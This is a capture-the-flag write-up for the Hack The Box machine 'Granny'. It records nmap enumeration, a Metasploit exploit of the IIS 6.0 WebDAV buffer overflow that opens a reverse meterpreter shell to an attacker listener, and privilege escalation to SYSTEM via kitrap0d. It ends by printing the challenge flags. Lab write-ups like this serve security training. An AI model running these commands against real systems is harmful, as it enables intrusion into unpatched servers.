Granny
About
Granny, while similar to Grandpa, can be exploited using several different methods. The intended method of solving this machine is the widely-known Webdav upload vulnerability.
Enumeration
Running the script portscan.sh reveals a single attack vector, HTTP.
┌──(m0nk3y@kali)-[~/HTB/Granny]
└─$ sudo portscan.sh 10.129.177.108
┌──(m0nk3y@kali)-[~/HTB/Granny]
└─$ cat PortScan\(10.129.177.108\)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
| http-ntlm-info:
| Target_Name: GRANNY
| NetBIOS_Domain_Name: GRANNY
| NetBIOS_Computer_Name: GRANNY
| DNS_Domain_Name: granny
| DNS_Computer_Name: granny
|_ Product_Version: 5.2.3790
|_http-server-header: Microsoft-IIS/6.0
| http-methods:
|_ Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
|_http-title: Under Construction
| http-webdav-scan:
| Server Date: Sat, 09 Sep 2023 05:14:48 GMT
| Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
| Server Type: Microsoft-IIS/6.0
|_ WebDAV type: Unknown
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Exploitation
HTTP
Since nmap revealed the HTTP service Microsoft IIS 6.0 running on the target, I’ll check if there are any known vulnerabilities for it using searchsploit-prettify.py. From the results, I’ll start by testing Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Remote Buffer Overflow as it seems to directly allow remote code execution.
┌──(m0nk3y@kali)-[~/HTB/Granny]
└─$ searchsploit-prettify.py 'Microsoft IIS 6.0'
---------------------------------------------------------------------------------------- ---------------------------------------------------------
| Exploit Title | Path |
---------------------------------------------------------------------------------------- ---------------------------------------------------------
| Microsoft IIS 4.0/5.0/6.0 - Internal IP Address/Internal Network Name Disclosure | /usr/share/exploitdb/exploits/windows/remote/21057.txt |
| Microsoft IIS 5.0/6.0 FTP Server (Windows 2000) - Remote Stack Overflow | /usr/share/exploitdb/exploits/windows/remote/9541.pl |
| Microsoft IIS 5.0/6.0 FTP Server - Stack Exhaustion Denial of Service | /usr/share/exploitdb/exploits/windows/dos/9587.txt |
| Microsoft IIS 6.0 - '/AUX / '.aspx' Remote Denial of Service | /usr/share/exploitdb/exploits/windows/dos/3965.pl |
| Microsoft IIS 6.0 - ASP Stack Overflow Stack Exhaustion (Denial of Service) (MS10-065) | /usr/share/exploitdb/exploits/windows/dos/15167.txt |
| Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Remote Buffer Overflow | /usr/share/exploitdb/exploits/windows/remote/41738.py |
| Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (1) | /usr/share/exploitdb/exploits/windows/remote/8704.txt |
| Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (2) | /usr/share/exploitdb/exploits/windows/remote/8806.pl |
| Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (Patch) | /usr/share/exploitdb/exploits/windows/remote/8754.patch |
| Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass | /usr/share/exploitdb/exploits/windows/remote/8765.php |
| Microsoft IIS 6.0/7.5 (+ PHP) - Multiple Vulnerabilities | /usr/share/exploitdb/exploits/windows/remote/19033.txt |
---------------------------------------------------------------------------------------- ---------------------------------------------------------
Using a Metasploit module for the same vulnerability, I’m able to gain a shell on the target. However, running the command getuid fails with an error message indicating that the access is denied. This is sometimes caused when the session we are using is spawned under a process without enough privileges.
┌──(m0nk3y@kali)-[~/HTB/Granny]
└─$ msfconsole -q -x 'use exploit/windows/iis/iis_webdav_scstoragepathfromurl; set RHOSTS 10.129.177.108; set RPORT 80; set LHOST 10.10.16.9; set LPORT 4444; run'
[*] Starting persistent handler(s)...
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
RHOSTS => 10.129.177.108
RPORT => 80
LHOST => 10.10.16.9
LPORT => 4444
[*] Started reverse TCP handler on 10.10.16.9:4444
[*] Trying path length 3 to 60 ...
[*] Sending stage (175686 bytes) to 10.129.177.108
[*] Meterpreter session 1 opened (10.10.16.9:4444 -> 10.129.177.108:1031) at 2023-09-09 01:16:13 -0400
meterpreter > getuid
[-] stdapi_sys_config_getuid: Operation failed: Access is denied.
By migrating to another process with higher privileges, I’m able to gain a shell as the user NT AUTHORITY\NETWORK SERVICE.
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System
272 4 smss.exe
320 272 csrss.exe
344 272 winlogon.exe
392 344 services.exe
404 344 lsass.exe
584 392 svchost.exe
668 392 svchost.exe
732 392 svchost.exe
772 392 svchost.exe
796 392 svchost.exe
988 392 spoolsv.exe
1016 392 msdtc.exe
1088 392 cisvc.exe
1136 392 svchost.exe
1192 392 inetinfo.exe
1228 392 svchost.exe
1332 392 VGAuthService.exe
1404 392 vmtoolsd.exe
1504 392 svchost.exe
1612 392 svchost.exe
1788 392 dllhost.exe
1960 392 alg.exe
1988 584 wmiprvse.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\wbem\wmiprvse.exe
2420 584 wmiprvse.exe
3256 1504 w3wp.exe x86 0 NT AUTHORITY\NETWORK SERVICE c:\windows\system32\inetsrv\w3wp.exe
3328 584 davcdata.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\inetsrv\davcdata.exe
3696 3256 rundll32.exe x86 0 C:\WINDOWS\system32\rundll32.exe
meterpreter > migrate 1988
[*] Migrating from 3696 to 1988...
[*] Migration completed successfully.
meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE
Privilege Escalation
In order to look for local vulnerabilities, I’ll use the module post/multi/recon/local_exploit_suggester. From the result, we can check that it revealed 7 potential exploits that can be used.
meterpreter > run post/multi/recon/local_exploit_suggester
[*] 10.129.177.108 - Collecting local exploits for x86/windows...
[*] 10.129.177.108 - 186 exploit checks are being tried...
[+] 10.129.177.108 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.129.177.108 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.129.177.108 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.129.177.108 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.129.177.108 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.129.177.108 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.129.177.108 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Running check method for exploit 41 / 41
[*] 10.129.177.108 - Valid modules for session 1:
============================
# Name Potentially Vulnerable? Check Result
- ---- ----------------------- ------------
1 exploit/windows/local/ms10_015_kitrap0d Yes The service is running, but could not be validated.
2 exploit/windows/local/ms14_058_track_popup_menu Yes The target appears to be vulnerable.
3 exploit/windows/local/ms14_070_tcpip_ioctl Yes The target appears to be vulnerable.
4 exploit/windows/local/ms15_051_client_copy_image Yes The target appears to be vulnerable.
5 exploit/windows/local/ms16_016_webdav Yes The service is running, but could not be validated.
6 exploit/windows/local/ms16_075_reflection Yes The target appears to be vulnerable.
7 exploit/windows/local/ppr_flatten_rec Yes The target appears to be vulnerable.
8 exploit/windows/local/adobe_sandbox_adobecollabsync No Cannot reliably check exploitability.
9 exploit/windows/local/agnitum_outpost_acs No The target is not exploitable.
10 exploit/windows/local/always_install_elevated No The target is not exploitable.
11 exploit/windows/local/anyconnect_lpe No The target is not exploitable. vpndownloader.exe not found on file system
12 exploit/windows/local/bits_ntlm_token_impersonation No The check raised an exception.
13 exploit/windows/local/bthpan No The target is not exploitable.
14 exploit/windows/local/bypassuac_eventvwr No The target is not exploitable.
15 exploit/windows/local/bypassuac_fodhelper No The target is not exploitable.
16 exploit/windows/local/bypassuac_sluihijack No The target is not exploitable.
17 exploit/windows/local/canon_driver_privesc No The target is not exploitable. No Canon TR150 driver directory found
18 exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move No The target is not exploitable. Target is not running a vulnerable version of Windows!
19 exploit/windows/local/cve_2020_1048_printerdemon No The target is not exploitable.
20 exploit/windows/local/cve_2020_1337_printerdemon No The target is not exploitable.
21 exploit/windows/local/gog_galaxyclientservice_privesc No The target is not exploitable. Galaxy Client Service not found
22 exploit/windows/local/ikeext_service No The check raised an exception.
23 exploit/windows/local/ipass_launch_app No The check raised an exception.
24 exploit/windows/local/lenovo_systemupdate No The check raised an exception.
25 exploit/windows/local/lexmark_driver_privesc No The check raised an exception.
26 exploit/windows/local/mqac_write No The target is not exploitable.
27 exploit/windows/local/ms10_092_schelevator No The target is not exploitable. Windows .NET Server (5.2 Build 3790, Service Pack 2). is not vulnerable
28 exploit/windows/local/ms13_053_schlamperei No The target is not exploitable.
29 exploit/windows/local/ms13_081_track_popup_menu No Cannot reliably check exploitability.
30 exploit/windows/local/ms15_004_tswbproxy No The target is not exploitable.
31 exploit/windows/local/ms16_032_secondary_logon_handle_privesc No The check raised an exception.
32 exploit/windows/local/ms16_075_reflection_juicy No The target is not exploitable.
33 exploit/windows/local/ms_ndproxy No The target is not exploitable.
34 exploit/windows/local/novell_client_nicm No The target is not exploitable.
35 exploit/windows/local/ntapphelpcachecontrol No The check raised an exception.
36 exploit/windows/local/ntusermndragover No The target is not exploitable.
37 exploit/windows/local/panda_psevents No The target is not exploitable.
38 exploit/windows/local/ricoh_driver_privesc No The target is not exploitable. No Ricoh driver directory found
39 exploit/windows/local/tokenmagic No The target is not exploitable.
40 exploit/windows/local/virtual_box_guest_additions No The target is not exploitable.
41 exploit/windows/local/webexec No The check raised an exception.
With a bit of brute-force, I’m able to use the module exploit/windows/local/ms10_015_kitrap0d to gain a shell as the user NT AUTHORITY\SYSTEM.
meterpreter > run exploit/windows/local/ms10_015_kitrap0d LHOST=10.10.16.9 LPORT=4444
[*] Started reverse TCP handler on 10.10.16.9:4444
[*] Reflectively injecting payload and triggering the bug...
[*] Launching msiexec to host the DLL...
[+] Process 2792 launched.
[*] Reflectively injecting the DLL into 2792...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (175686 bytes) to 10.129.177.108
[*] Meterpreter session 2 opened (10.10.16.9:4444 -> 10.129.177.108:1032) at 2023-09-09 01:19:13 -0400
[*] Session 2 created in the background.
meterpreter > sessions 2
[*] Backgrounding session 1...
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Post Exploitation
With the shell acquired, I’m able to read the flags user.txt and root.txt.
meterpreter > cat 'C:\Documents and Settings\Lakis\Desktop\user.txt'
700c5dc163014e22b3e408f8703f67d1
meterpreter > cat 'C:\Documents and Settings\Administrator\Desktop\root.txt'
aa4beed1c0584445ab463a6747bd06e9